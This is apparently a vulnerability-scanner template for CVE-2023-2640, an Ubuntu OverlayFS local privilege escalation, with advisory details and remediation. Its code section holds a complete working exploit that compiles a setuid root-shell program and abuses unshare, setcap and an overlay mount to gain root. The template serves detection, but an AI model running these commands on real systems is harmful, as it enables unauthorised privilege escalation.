id: CVE-2023-2640

info:
  name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
  author: princechaddha
  severity: high
  description: |
    A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
  impact: |
    An attacker with local access can gain elevated privileges on the affected system.
  remediation: |
    Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
  reference:
    - http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2640
    - https://www.wiz.io/blog/ubuntu-overlayfs-vulnerability
    - https://ubuntu.com/security/notices/USN-6250-1
    - https://lists.ubuntu.com/archives/kernel-team/2023-July/140923.html
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2023-2640
    cwe-id: CWE-863
    epss-score: 0.00047
    epss-percentile: 0.14754
    cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: canonical
    product: ubuntu_linux
  tags: cve,cve2023,code,packetstorm,kernel,ubuntu,linux,privesc,local,canonical

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      id

  - engine:
      - sh
      - bash
    source: |
      cd /tmp
      echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
      gcc test.c -o test
      unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"

    matchers:
      - type: dsl
        dsl:
          - '!contains(code_1_response, "(root)")'
          - 'contains(code_2_response, "(root)")'
        condition: and
# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950